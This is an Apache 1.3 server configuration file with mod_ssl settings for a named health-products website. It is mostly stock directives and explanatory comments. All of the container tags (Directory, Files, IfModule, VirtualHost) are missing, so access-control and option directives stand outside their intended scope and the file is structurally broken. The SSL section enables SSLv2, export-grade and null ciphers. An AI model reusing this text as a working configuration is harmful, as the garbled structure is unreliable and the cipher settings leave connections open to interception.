#LockFile /usr/local/apache1.3/logs/httpd.lock

#
# PidFile: The file in which the server should record its process
# identification number when it starts.
#
PidFile /usr/local/apache1.3/logs/httpd.pid

#
# ScoreBoardFile: File used to store internal server process information.
# Not all architectures require this.  But if yours does (you'll know because
# this file will be  created when you run Apache) then you *must* ensure that
# no two invocations of Apache share the same scoreboard file.
#
ScoreBoardFile /usr/local/apache1.3/logs/httpd.scoreboard

#
# In the standard configuration, the server will process httpd.conf (this 
# file, specified by the -f command line option), srm.conf, and access.conf 
# in that order.  The latter two files are now distributed empty, as it is 
# recommended that all directives be kept in a single file for simplicity.  
# The commented-out values below are the built-in defaults.  You can have the 
# server ignore these files altogether by using "/dev/null" (for Unix) or
# "nul" (for Win32) for the arguments to the directives.
#
#ResourceConfig conf/srm.conf
#AccessConfig conf/access.conf

#
# Timeout: The number of seconds before receives and sends time out.
#
Timeout 300

#
# KeepAlive: Whether or not to allow persistent connections (more than
# one request per connection). Set to "Off" to deactivate.
#
KeepAlive On

#
# MaxKeepAliveRequests: The maximum number of requests to allow
# during a persistent connection. Set to 0 to allow an unlimited amount.
# We recommend you leave this number high, for maximum performance.
#
MaxKeepAliveRequests 100

#
# KeepAliveTimeout: Number of seconds to wait for the next request from the
# same client on the same connection.
#
KeepAliveTimeout 15

#
# Server-pool size regulation.  Rather than making you guess how many
# server processes you need, Apache dynamically adapts to the load it
# sees --- that is, it tries to maintain enough server processes to
# handle the current load, plus a few spare servers to handle transient
# load spikes (e.g., multiple simultaneous requests from a single
# Netscape browser).
#
# It does this by periodically checking how many servers are waiting
# for a request.  If there are fewer than MinSpareServers, it creates
# a new spare.  If there are more than MaxSpareServers, some of the
# spares die off.  The default values are probably OK for most sites.
#
MinSpareServers 5
MaxSpareServers 10

#
# Number of servers to start initially --- should be a reasonable ballpark
# figure.
#
StartServers 5

#
# Limit on total number of servers running, i.e., limit on the number
# of clients who can simultaneously connect --- if this limit is ever
# reached, clients will be LOCKED OUT, so it should NOT BE SET TOO LOW.
# It is intended mainly as a brake to keep a runaway server from taking
# the system with it as it spirals down...
#
MaxClients 150

#
# MaxRequestsPerChild: the number of requests each child process is
# allowed to process before the child dies.  The child will exit so
# as to avoid problems after prolonged use when Apache (and maybe the
# libraries it uses) leak memory or other resources.  On most systems, this
# isn't really needed, but a few (such as Solaris) do have notable leaks
# in the libraries. For these platforms, set to something like 10000
# or so; a setting of 0 means unlimited.
#
# NOTE: This value does not include keepalive requests after the initial
#       request per connection. For example, if a child process handles
#       an initial request and 10 subsequent "keptalive" requests, it
#       would only count as 1 request towards this limit.
#
MaxRequestsPerChild 0

#
# Listen: Allows you to bind Apache to specific IP addresses and/or
# ports, in addition to the default. See also the 
# directive.
#
#Listen 3000
#Listen 12.34.56.78:80

#
# BindAddress: You can support virtual hosts with this option. This directive
# is used to tell the server which IP address to listen to. It can either
# contain "*", an IP address, or a fully qualified Internet domain name.
# See also the  and Listen directives.
#
#BindAddress *

#
# Dynamic Shared Object (DSO) Support
#
# To be able to use the functionality of a module which was built as a DSO you
# have to place corresponding `LoadModule' lines at this location so the
# directives contained in it are actually available _before_ they are used.
# Please read the file http://httpd.apache.org/docs/dso.html for more
# details about the DSO mechanism and run `httpd -l' for the list of already
# built-in (statically linked and thus always available) modules in your httpd
# binary.
#
# Note: The order in which modules are loaded is important.  Don't change
# the order below without expert advice.
#
# Example:
# LoadModule foo_module libexec/mod_foo.so

LoadModule ssl_module         libexec/libssl.so


#  Reconstruction of the complete module list from all available modules
#  (static and shared ones) to achieve correct module execution order.
#  [WHENEVER YOU CHANGE THE LOADMODULE SECTION ABOVE UPDATE THIS, TOO]
ClearModuleList
AddModule mod_env.c
AddModule mod_log_config.c
AddModule mod_mime.c
AddModule mod_negotiation.c
AddModule mod_status.c
AddModule mod_include.c
AddModule mod_autoindex.c
AddModule mod_dir.c
AddModule mod_cgi.c
AddModule mod_asis.c
AddModule mod_imap.c
AddModule mod_actions.c
AddModule mod_userdir.c
AddModule mod_alias.c
AddModule mod_access.c
AddModule mod_auth.c
AddModule mod_so.c
AddModule mod_setenvif.c

AddModule mod_ssl.c


#
# ExtendedStatus controls whether Apache will generate "full" status
# information (ExtendedStatus On) or just basic information (ExtendedStatus
# Off) when the "server-status" handler is called. The default is Off.
#
#ExtendedStatus On

### Section 2: 'Main' server configuration
#
# The directives in this section set up the values used by the 'main'
# server, which responds to any requests that aren't handled by a
#  definition.  These values also provide defaults for
# any  containers you may define later in the file.
#
# All of these directives may appear inside  containers,
# in which case these default settings will be overridden for the
# virtual host being defined.
#

#
# If your ServerType directive (set earlier in the 'Global Environment'
# section) is set to "inetd", the next few directives don't have any
# effect since their settings are defined by the inetd configuration.
# Skip ahead to the ServerAdmin directive.
#

#
# Port: The port to which the standalone server listens. For
# ports < 1023, you will need httpd to be run as root initially.
#
Port 443

##
##  SSL Support
##
##  When we also provide SSL we have to listen to the 
##  standard HTTP port (see above) and to the HTTPS port
##

Listen 443


#
# If you wish httpd to run as a different user or group, you must run
# httpd as root initially and it will switch.  
#
# User/Group: The name (or #number) of the user/group to run httpd as.
#  . On SCO (ODT 3) use "User nouser" and "Group nogroup".
#  . On HPUX you may not be able to use shared memory as nobody, and the
#    suggested workaround is to create a user www and use that user.
#  NOTE that some kernels refuse to setgid(Group) or semctl(IPC_SET)
#  when the value of (unsigned)Group is above 60000; 
#  don't use Group nobody on these systems!
#
User nobody
Group nobody

#
# ServerAdmin: Your address, where problems with the server should be
# e-mailed.  This address appears on some server-generated pages, such
# as error documents.
#
ServerAdmin kperrier@ev1.net

#
# ServerName allows you to set a host name which is sent back to clients for
# your server if it's different than the one the program would get (i.e., use
# "www" instead of the host's real name).
#
# Note: You cannot just invent host names and hope they work. The name you 
# define here must be a valid DNS name for your host. If you don't understand
# this, ask your network administrator.
# If your host doesn't have a registered DNS name, enter its IP address here.
# You will have to access it by its address (e.g., http://123.45.67.89/)
# anyway, and this will make redirections work in a sensible way.
#
# 127.0.0.1 is the TCP/IP local loop-back address, often named localhost. Your 
# machine always knows itself by this address. If you use Apache strictly for 
# local testing and development, you may use 127.0.0.1 as the server name.
#
ServerName www.bestofhealthamerica.com

#
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "/usr/local/apache1.3/htdocs"

#
# Each directory to which Apache has access, can be configured with respect
# to which services and features are allowed and/or disabled in that
# directory (and its subdirectories). 
#
# First, we configure the "default" to be a very restrictive set of 
# permissions.  
#

    Options FollowSymLinks
    AllowOverride None


#
# Note that from this point forward you must specifically allow
# particular features to be enabled - so if something's not working as
# you might expect, make sure that you have specifically enabled it
# below.
#

#
# This should be changed to whatever you set DocumentRoot to.
#


#
# This may also be "None", "All", or any combination of "Indexes",
# "Includes", "FollowSymLinks", "ExecCGI", or "MultiViews".
#
# Note that "MultiViews" must be named *explicitly* --- "Options All"
# doesn't give it to you.
#
    Options Indexes FollowSymLinks MultiViews

#
# This controls which options the .htaccess files in directories can
# override. Can also be "All", or any combination of "Options", "FileInfo", 
# "AuthConfig", and "Limit"
#
    AllowOverride None

#
# Controls who can get stuff from this server.
#
    Order allow,deny
    Allow from all


#
# UserDir: The name of the directory which is appended onto a user's home
# directory if a ~user request is received.
#

    UserDir public_html


#
# DirectoryIndex: Name of the file or files to use as a pre-written HTML
# directory index.  Separate multiple entries with spaces.
#

    DirectoryIndex index.html


#
# AccessFileName: The name of the file to look for in each directory
# for access control information.
#
AccessFileName .htaccess

#
# The following lines prevent .htaccess files from being viewed by
# Web clients.  Since .htaccess files often contain authorization
# information, access is disallowed for security reasons.  Comment
# these lines out if you want Web visitors to see the contents of
# .htaccess files.  If you change the AccessFileName directive above,
# be sure to make the corresponding changes here.
#
# Also, folks tend to use names such as .htpasswd for password
# files, so this will protect those as well.
#

    Order allow,deny
    Deny from all
    Satisfy All


#
# CacheNegotiatedDocs: By default, Apache sends "Pragma: no-cache" with each
# document that was negotiated on the basis of content. This asks proxy
# servers not to cache the document. Uncommenting the following line disables
# this behavior, and proxies will be allowed to cache the documents.
#
#CacheNegotiatedDocs

#
# UseCanonicalName:  (new for 1.3)  With this setting turned on, whenever
# Apache needs to construct a self-referencing URL (a URL that refers back
# to the server the response is coming from) it will use ServerName and
# Port to form a "canonical" name.  With this setting off, Apache will
# use the hostname:port that the client supplied, when possible.  This
# also affects SERVER_NAME and SERVER_PORT in CGI scripts.
#
UseCanonicalName On

#
# TypesConfig describes where the mime.types file (or equivalent) is
# to be found.
#

    TypesConfig /usr/local/apache1.3/conf/mime.types


#
# DefaultType is the default MIME type the server will use for a document
# if it cannot otherwise determine one, such as from filename extensions.
# If your server contains mostly text or HTML documents, "text/plain" is
# a good value.  If most of your content is binary, such as applications
# or images, you may want to use "application/octet-stream" instead to
# keep browsers from trying to display binary files as though they are
# text.
#
DefaultType text/plain

#
# The mod_mime_magic module allows the server to use various hints from the
# contents of the file itself to determine its type.  The MIMEMagicFile
# directive tells the module where the hint definitions are located.
# mod_mime_magic is not part of the default server (you have to add
# it yourself with a LoadModule [see the DSO paragraph in the 'Global
# Environment' section], or recompile the server and include mod_mime_magic
# as part of the configuration), so it's enclosed in an  container.
# This means that the MIMEMagicFile directive will only be processed if the
# module is part of the server.
#

    MIMEMagicFile /usr/local/apache1.3/conf/magic


#
# HostnameLookups: Log the names of clients or just their IP addresses
# e.g., www.apache.org (on) or 204.62.129.132 (off).
# The default is off because it'd be overall better for the net if people
# had to knowingly turn this feature on, since enabling it means that
# each client request will result in AT LEAST one lookup request to the
# nameserver.
#
HostnameLookups Off

#
# ErrorLog: The location of the error log file.
# If you do not specify an ErrorLog directive within a 
# container, error messages relating to that virtual host will be
# logged here.  If you *do* define an error logfile for a 
# container, that host's errors will be logged there and not here.
#
ErrorLog /usr/local/apache1.3/logs/error_log

#
# LogLevel: Control the number of messages logged to the error_log.
# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
#
LogLevel warn

#
# The following directives define some format nicknames for use with
# a CustomLog directive (see below).
#
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
LogFormat "%h %l %u %t \"%r\" %>s %b" common
LogFormat "%{Referer}i -> %U" referer
LogFormat "%{User-agent}i" agent

#
# The location and format of the access logfile (Common Logfile Format).
# If you do not define any access logfiles within a 
# container, they will be logged here.  Contrariwise, if you *do*
# define per- access logfiles, transactions will be
# logged therein and *not* in this file.
#
CustomLog /usr/local/apache1.3/logs/access_log common

#
# If you would like to have agent and referer logfiles, uncomment the
# following directives.
#
#CustomLog /usr/local/apache1.3/logs/referer_log referer
#CustomLog /usr/local/apache1.3/logs/agent_log agent

#
# If you prefer a single logfile with access, agent, and referer information
# (Combined Logfile Format) you can use the following directive.
#
#CustomLog /usr/local/apache1.3/logs/access_log combined

#
# Optionally add a line containing the server version and virtual host
# name to server-generated pages (error documents, FTP directory listings,
# mod_status and mod_info output etc., but not CGI generated documents).
# Set to "EMail" to also include a mailto: link to the ServerAdmin.
# Set to one of:  On | Off | EMail
#
ServerSignature On

#
# Aliases: Add here as many aliases as you need (with no limit). The format is 
# Alias fakename realname
#


    #
    # Note that if you include a trailing / on fakename then the server will
    # require it to be present in the URL.  So "/icons" isn't aliased in this
    # example, only "/icons/".  If the fakename is slash-terminated, then the 
    # realname must also be slash terminated, and if the fakename omits the 
    # trailing slash, the realname must also omit it.
    #
    Alias /icons/ "/usr/local/apache1.3/icons/"

    
        Options Indexes MultiViews
        AllowOverride None
        Order allow,deny
        Allow from all
    

    # This Alias will project the on-line documentation tree under /manual/
    # even if you change the DocumentRoot. Comment it if you don't want to 
    # provide access to the on-line documentation.
    #
    Alias /manual/ "/usr/local/apache1.3/htdocs/manual/"

    
        Options Indexes FollowSymlinks MultiViews
        AllowOverride None
        Order allow,deny
        Allow from all
    

    #
    # ScriptAlias: This controls which directories contain server scripts.
    # ScriptAliases are essentially the same as Aliases, except that
    # documents in the realname directory are treated as applications and
    # run by the server when requested rather than as documents sent to the client.
    # The same rules about trailing "/" apply to ScriptAlias directives as to
    # Alias.
    #
    ScriptAlias /cgi-bin/ "/usr/local/apache1.3/cgi-bin/"

    #
    # "/usr/local/apache1.3/cgi-bin" should be changed to whatever your ScriptAliased
    # CGI directory exists, if you have that configured.
    #
    
        AllowOverride None
        Options None
        Order allow,deny
        Allow from all
    


# End of aliases.

#
# Redirect allows you to tell clients about documents which used to exist in
# your server's namespace, but do not anymore. This allows you to tell the
# clients where to look for the relocated document.
# Format: Redirect old-URI new-URL
#

#
# Directives controlling the display of server-generated directory listings.
#


    #
    # FancyIndexing is whether you want fancy directory indexing or standard
    #
    IndexOptions FancyIndexing

    #
    # AddIcon* directives tell the server which icon to show for different
    # files or filename extensions.  These are only displayed for
    # FancyIndexed directories.
    #
    AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip

    AddIconByType (TXT,/icons/text.gif) text/*
    AddIconByType (IMG,/icons/image2.gif) image/*
    AddIconByType (SND,/icons/sound2.gif) audio/*
    AddIconByType (VID,/icons/movie.gif) video/*

    AddIcon /icons/binary.gif .bin .exe
    AddIcon /icons/binhex.gif .hqx
    AddIcon /icons/tar.gif .tar
    AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv
    AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip
    AddIcon /icons/a.gif .ps .ai .eps
    AddIcon /icons/layout.gif .html .shtml .htm .pdf
    AddIcon /icons/text.gif .txt
    AddIcon /icons/c.gif .c
    AddIcon /icons/p.gif .pl .py
    AddIcon /icons/f.gif .for
    AddIcon /icons/dvi.gif .dvi
    AddIcon /icons/uuencoded.gif .uu
    AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl
    AddIcon /icons/tex.gif .tex
    AddIcon /icons/bomb.gif core

    AddIcon /icons/back.gif ..
    AddIcon /icons/hand.right.gif README
    AddIcon /icons/folder.gif ^^DIRECTORY^^
    AddIcon /icons/blank.gif ^^BLANKICON^^

    #
    # DefaultIcon is which icon to show for files which do not have an icon
    # explicitly set.
    #
    DefaultIcon /icons/unknown.gif

    #
    # AddDescription allows you to place a short description after a file in
    # server-generated indexes.  These are only displayed for FancyIndexed
    # directories.
    # Format: AddDescription "description" filename
    #
    #AddDescription "GZIP compressed document" .gz
    #AddDescription "tar archive" .tar
    #AddDescription "GZIP compressed tar archive" .tgz

    #
    # ReadmeName is the name of the README file the server will look for by
    # default, and append to directory listings.
    #
    # HeaderName is the name of a file which should be prepended to
    # directory indexes. 
    #
    # If MultiViews are amongst the Options in effect, the server will
    # first look for name.html and include it if found.  If name.html
    # doesn't exist, the server will then look for name.txt and include
    # it as plaintext if found.
    #
    ReadmeName README
    HeaderName HEADER

    #
    # IndexIgnore is a set of filenames which directory indexing should ignore
    # and not include in the listing.  Shell-style wildcarding is permitted.
    #
    IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t


# End of indexing directives.

#
# Document types.
#


    #
    # AddEncoding allows you to have certain browsers (Mosaic/X 2.1+) uncompress
    # information on the fly. Note: Not all browsers support this.
    # Despite the name similarity, the following Add* directives have nothing
    # to do with the FancyIndexing customization directives above.
    #
    AddEncoding x-compress Z
    AddEncoding x-gzip gz tgz

    #
    # AddLanguage allows you to specify the language of a document. You can
    # then use content negotiation to give a browser a file in a language
    # it can understand.  
    #
    # Note 1: The suffix does not have to be the same as the language 
    # keyword --- those with documents in Polish (whose net-standard 
    # language code is pl) may wish to use "AddLanguage pl .po" to 
    # avoid the ambiguity with the common suffix for perl scripts.
    #
    # Note 2: The example entries below illustrate that in quite
    # some cases the two character 'Language' abbreviation is not
    # identical to the two character 'Country' code for its country,
    # E.g. 'Danmark/dk' versus 'Danish/da'.
    #
    # Note 3: In the case of 'ltz' we violate the RFC by using a three char 
    # specifier. But there is 'work in progress' to fix this and get 
    # the reference data for rfc1766 cleaned up.
    #
    # Danish (da) - Dutch (nl) - English (en) - Estonian (ee)
    # French (fr) - German (de) - Greek-Modern (el)
    # Italian (it) - Korean (kr) - Norwegian (no) - Norwegian Nynorsk (nn)
    # Portugese (pt) - Luxembourgeois* (ltz)
    # Spanish (es) - Swedish (sv) - Catalan (ca) - Czech(cz)
    # Polish (pl) - Brazilian Portuguese (pt-br) - Japanese (ja)
    # Russian (ru)
    #
    AddLanguage da .dk
    AddLanguage nl .nl
    AddLanguage en .en
    AddLanguage et .ee
    AddLanguage fr .fr
    AddLanguage de .de
    AddLanguage el .el
    AddLanguage he .he
    AddCharset ISO-8859-8 .iso8859-8
    AddLanguage it .it
    AddLanguage ja .ja
    AddCharset ISO-2022-JP .jis
    AddLanguage kr .kr
    AddCharset ISO-2022-KR .iso-kr
    AddLanguage nn .nn
    AddLanguage no .no
    AddLanguage pl .po
    AddCharset ISO-8859-2 .iso-pl
    AddLanguage pt .pt
    AddLanguage pt-br .pt-br
    AddLanguage ltz .lu
    AddLanguage ca .ca
    AddLanguage es .es
    AddLanguage sv .sv
    AddLanguage cz .cz
    AddLanguage ru .ru
    AddLanguage zh-tw .tw
    AddLanguage tw .tw
    AddCharset Big5         .Big5    .big5
    AddCharset WINDOWS-1251 .cp-1251
    AddCharset CP866        .cp866
    AddCharset ISO-8859-5   .iso-ru
    AddCharset KOI8-R       .koi8-r
    AddCharset UCS-2        .ucs2
    AddCharset UCS-4        .ucs4
    AddCharset UTF-8        .utf8

    # LanguagePriority allows you to give precedence to some languages
    # in case of a tie during content negotiation.
    #
    # Just list the languages in decreasing order of preference. We have
    # more or less alphabetized them here. You probably want to change this.
    #
    
        LanguagePriority en da nl et fr de el it ja kr no pl pt pt-br ru ltz ca es sv tw
    

    #
    # AddType allows you to tweak mime.types without actually editing it, or to
    # make certain files to be certain types.
    #
    AddType application/x-tar .tgz
    AddType image/x-icon .ico

    #
    # AddHandler allows you to map certain file extensions to "handlers",
    # actions unrelated to filetype. These can be either built into the server
    # or added with the Action command (see below)
    #
    # If you want to use server side includes, or CGI outside
    # ScriptAliased directories, uncomment the following lines.
    #
    # To use CGI scripts:
    #
    #AddHandler cgi-script .cgi

    #
    # To use server-parsed HTML files
    #
    #AddType text/html .shtml
    #AddHandler server-parsed .shtml

    #
    # Uncomment the following line to enable Apache's send-asis HTTP file
    # feature
    #
    #AddHandler send-as-is asis

    #
    # If you wish to use server-parsed imagemap files, use
    #
    #AddHandler imap-file map

    #
    # To enable type maps, you might want to use
    #
    #AddHandler type-map var


# End of document types.

#
# Action lets you define media types that will execute a script whenever
# a matching file is called. This eliminates the need for repeated URL
# pathnames for oft-used CGI file processors.
# Format: Action media/type /cgi-script/location
# Format: Action handler-name /cgi-script/location
#

#
# MetaDir: specifies the name of the directory in which Apache can find
# meta information files. These files contain additional HTTP headers
# to include when sending the document
#
#MetaDir .web

#
# MetaSuffix: specifies the file name suffix for the file containing the
# meta information.
#
#MetaSuffix .meta

#
# Customizable error response (Apache style)
#  these come in three flavors
#
#    1) plain text
#ErrorDocument 500 "The server made a boo boo.
#  n.b.  the single leading (") marks it as text, it does not get output
#
#    2) local redirects
#ErrorDocument 404 /missing.html
#  to redirect to local URL /missing.html
#ErrorDocument 404 /cgi-bin/missing_handler.pl
#  N.B.: You can redirect to a script or a document using server-side-includes.
#
#    3) external redirects
#ErrorDocument 402 http://some.other-server.com/subscription_info.html
#  N.B.: Many of the environment variables associated with the original
#  request will *not* be available to such a script.

#
# Customize behaviour based on the browser
#


    #
    # The following directives modify normal HTTP response behavior.
    # The first directive disables keepalive for Netscape 2.x and browsers that
    # spoof it. There are known problems with these browser implementations.
    # The second directive is for Microsoft Internet Explorer 4.0b2
    # which has a broken HTTP/1.1 implementation and does not properly
    # support keepalive when it is used on 301 or 302 (redirect) responses.
    #
    BrowserMatch "Mozilla/2" nokeepalive
    BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0

    #
    # The following directive disables HTTP/1.1 responses to browsers which
    # are in violation of the HTTP/1.0 spec by not being able to grok a
    # basic 1.1 response.
    #
    BrowserMatch "RealPlayer 4\.0" force-response-1.0
    BrowserMatch "Java/1\.0" force-response-1.0
    BrowserMatch "JDK/1\.0" force-response-1.0


# End of browser customization directives

#
# Allow server status reports, with the URL of http://servername/server-status
# Change the ".your-domain.com" to match your domain to enable.
#
#
#    SetHandler server-status
#    Order deny,allow
#    Deny from all
#    Allow from .your-domain.com
#

#
# Allow remote server configuration reports, with the URL of
# http://servername/server-info (requires that mod_info.c be loaded).
# Change the ".your-domain.com" to match your domain to enable.
#
#
#    SetHandler server-info
#    Order deny,allow
#    Deny from all
#    Allow from .your-domain.com
#

#
# There have been reports of people trying to abuse an old bug from pre-1.1
# days.  This bug involved a CGI script distributed as a part of Apache.
# By uncommenting these lines you can redirect these attacks to a logging 
# script on phf.apache.org.  Or, you can record them yourself, using the script
# support/phf_abuse_log.cgi.
#
#
#    Deny from all
#    ErrorDocument 403 http://phf.apache.org/phf_abuse_log.cgi
#

#
# Proxy Server directives. Uncomment the following lines to
# enable the proxy server:
#
#
#    ProxyRequests On

#    
#        Order deny,allow
#        Deny from all
#        Allow from .your-domain.com
#    

    #
    # Enable/disable the handling of HTTP/1.1 "Via:" headers.
    # ("Full" adds the server version; "Block" removes all outgoing Via: headers)
    # Set to one of: Off | On | Full | Block
    #
#    ProxyVia On

    #
    # To enable the cache as well, edit and uncomment the following lines:
    # (no cacheing without CacheRoot)
    #
#    CacheRoot "/usr/local/apache1.3/proxy"
#    CacheSize 5
#    CacheGcInterval 4
#    CacheMaxExpire 24
#    CacheLastModifiedFactor 0.1
#    CacheDefaultExpire 1
#    NoCache a-domain.com another-domain.edu joes.garage-sale.com

#
# End of proxy directives.

### Section 3: Virtual Hosts
#
# VirtualHost: If you want to maintain multiple domains/hostnames on your
# machine you can setup VirtualHost containers for them. Most configurations
# use only name-based virtual hosts so the server doesn't need to worry about
# IP addresses. This is indicated by the asterisks in the directives below.
#
# Please see the documentation at 
# for further details before you try to setup virtual hosts.
#
# You may use the command line option '-S' to verify your virtual host
# configuration.

#
# Use name-based virtual hosting.
#
#NameVirtualHost *

#
# VirtualHost example:
# Almost any Apache directive may go into a VirtualHost container.
# The first VirtualHost section is used for requests without a known
# server name.
#
#
#    ServerAdmin webmaster@dummy-host.example.com
#    DocumentRoot /www/docs/dummy-host.example.com
#    ServerName dummy-host.example.com
#    ErrorLog logs/dummy-host.example.com-error_log
#    CustomLog logs/dummy-host.example.com-access_log common
#

#
#

##
##  SSL Global Context
##
##  All SSL configuration in this context applies both to
##  the main server and all SSL-enabled virtual hosts.
##

#
#   Some MIME-types for downloading Certificates and CRLs
#

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl




#   Pass Phrase Dialog:
#   Configure the pass phrase gathering process.
#   The filtering dialog program (`builtin' is a internal
#   terminal dialog) has to provide the pass phrase on stdout.
SSLPassPhraseDialog  builtin

#   Inter-Process Session Cache:
#   Configure the SSL Session Cache: First the mechanism 
#   to use and second the expiring timeout (in seconds).
#SSLSessionCache        none
#SSLSessionCache        shmht:/usr/local/apache1.3/logs/ssl_scache(512000)
#SSLSessionCache        shmcb:/usr/local/apache1.3/logs/ssl_scache(512000)
SSLSessionCache         dbm:/usr/local/apache1.3/logs/ssl_scache
SSLSessionCacheTimeout  300

#   Semaphore:
#   Configure the path to the mutual exclusion semaphore the
#   SSL engine uses internally for inter-process synchronization. 
SSLMutex  file:/usr/local/apache1.3/logs/ssl_mutex

#   Pseudo Random Number Generator (PRNG):
#   Configure one or more sources to seed the PRNG of the 
#   SSL library. The seed data should be of good random quality.
#   WARNING! On some platforms /dev/random blocks if not enough entropy
#   is available. This means you then cannot use the /dev/random device
#   because it would lead to very long connection times (as long as
#   it requires to make more entropy available). But usually those
#   platforms additionally provide a /dev/urandom device which doesn't
#   block. So, if available, use this one instead. Read the mod_ssl User
#   Manual for more details.
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
#SSLRandomSeed startup file:/dev/random  512
#SSLRandomSeed startup file:/dev/urandom 512
#SSLRandomSeed connect file:/dev/random  512
#SSLRandomSeed connect file:/dev/urandom 512

#   Logging:
#   The home of the dedicated SSL protocol logfile. Errors are
#   additionally duplicated in the general error log file.  Put
#   this somewhere where it cannot be used for symlink attacks on
#   a real server (i.e. somewhere where only root can write).
#   Log levels are (ascending order: higher ones include lower ones):
#   none, error, warn, info, trace, debug.
SSLLog      /usr/local/apache1.3/logs/ssl_engine_log
SSLLogLevel info





##
## SSL Virtual Host Context
##

#   SSL Engine Switch:
#   Enable/Disable SSL for this virtual host.
#SSLEngine on

#   SSL Cipher Suite:
#   List the ciphers that the client is permitted to negotiate.
#   See the mod_ssl documentation for a complete list.
SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time. Keep in mind that if you've both a RSA and a DSA
#   certificate you can configure both in parallel (to also allow
#   the use of DSA ciphers, etc.)
SSLCertificateFile /usr/local/apache1.3/conf/ssl.crt/server.crt
#SSLCertificateFile /usr/local/apache1.3/conf/ssl.crt/server-dsa.crt

#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)
SSLCertificateKeyFile /usr/local/apache1.3/conf/ssl.key/server.key
#SSLCertificateKeyFile /usr/local/apache1.3/conf/ssl.key/server-dsa.key

#   Server Certificate Chain:
#   Point SSLCertificateChainFile at a file containing the
#   concatenation of PEM encoded CA certificates which form the
#   certificate chain for the server certificate. Alternatively
#   the referenced file can be the same as SSLCertificateFile
#   when the CA certificates are directly appended to the server
#   certificate for convinience.
#SSLCertificateChainFile /usr/local/apache1.3/conf/ssl.crt/ca.crt

#   Certificate Authority (CA):
#   Set the CA certificate verification path where to find CA
#   certificates for client authentication or alternatively one
#   huge file containing all of them (file must be PEM encoded)
#   Note: Inside SSLCACertificatePath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCACertificatePath /usr/local/apache1.3/conf/ssl.crt
#SSLCACertificateFile /usr/local/apache1.3/conf/ssl.crt/ca-bundle.crt

#   Certificate Revocation Lists (CRL):
#   Set the CA revocation path where to find CA CRLs for client
#   authentication or alternatively one huge file containing all
#   of them (file must be PEM encoded)
#   Note: Inside SSLCARevocationPath you need hash symlinks
#         to point to the certificate files. Use the provided
#         Makefile to update the hash symlinks after changes.
#SSLCARevocationPath /usr/local/apache1.3/conf/ssl.crl
#SSLCARevocationFile /usr/local/apache1.3/conf/ssl.crl/ca-bundle.crl

#   Client Authentication (Type):
#   Client certificate verification type and depth.  Types are
#   none, optional, require and optional_no_ca.  Depth is a
#   number which specifies how deeply to verify the certificate
#   issuer chain before deciding the certificate is not valid.
#SSLVerifyClient require
#SSLVerifyDepth  10

#   Access Control:
#   With SSLRequire you can do per-directory access control based
#   on arbitrary complex boolean expressions containing server
#   variable checks and other lookup directives.  The syntax is a
#   mixture between C and Perl.  See the mod_ssl documentation
#   for more details.
#
#SSLRequire (    %{SSL_CIPHER} !~ m/^(EXP|NULL)/ \
#            and %{SSL_CLIENT_S_DN_O} eq "Snake Oil, Ltd." \
#            and %{SSL_CLIENT_S_DN_OU} in {"Staff", "CA", "Dev"} \
#            and %{TIME_WDAY} >= 1 and %{TIME_WDAY} <= 5 \
#            and %{TIME_HOUR} >= 8 and %{TIME_HOUR} <= 20       ) \
#           or %{REMOTE_ADDR} =~ m/^192\.76\.162\.[0-9]+$/
#

#   SSL Engine Options:
#   Set various options for the SSL engine.
#   o FakeBasicAuth:
#     Translate the client X.509 into a Basic Authorisation.  This means that
#     the standard Auth/DBMAuth methods can be used for access control.  The
#     user name is the `one line' version of the client's X.509 certificate.
#     Note that no password is obtained from the user. Every entry in the user
#     file needs this password: `xxj31ZMTZzkVA'.
#   o ExportCertData:
#     This exports two additional environment variables: SSL_CLIENT_CERT and
#     SSL_SERVER_CERT. These contain the PEM-encoded certificates of the
#     server (always existing) and the client (only existing when client
#     authentication is used). This can be used to import the certificates
#     into CGI scripts.
#   o StdEnvVars:
#     This exports the standard SSL/TLS related `SSL_*' environment variables.
#     Per default this exportation is switched off for performance reasons,
#     because the extraction step is an expensive operation and is usually
#     useless for serving static content. So one usually enables the
#     exportation for CGI and SSI requests only.
#   o CompatEnvVars:
#     This exports obsolete environment variables for backward compatibility
#     to Apache-SSL 1.x, mod_ssl 2.0.x, Sioux 1.0 and Stronghold 2.x. Use this
#     to provide compatibility to existing CGI scripts.
#   o StrictRequire:
#     This denies access when "SSLRequireSSL" or "SSLRequire" applied even
#     under a "Satisfy any" situation, i.e. when it applies access is denied
#     and no other module can change it.
#   o OptRenegotiate:
#     This enables optimized SSL connection renegotiation handling when SSL
#     directives are used in per-directory context. 
#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars +StrictRequire

    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


#   SSL Protocol Adjustments:
#   The safe and default but still SSL/TLS standard compliant shutdown
#   approach is that mod_ssl sends the close notify alert but doesn't wait for
#   the close notify alert from client. When you need a different shutdown
#   approach you can use one of the following variables:
#   o ssl-unclean-shutdown:
#     This forces an unclean shutdown when the connection is closed, i.e. no
#     SSL close notify alert is send or allowed to received.  This violates
#     the SSL/TLS standard but is needed for some brain-dead browsers. Use
#     this when you receive I/O errors because of the standard approach where
#     mod_ssl sends the close notify alert.
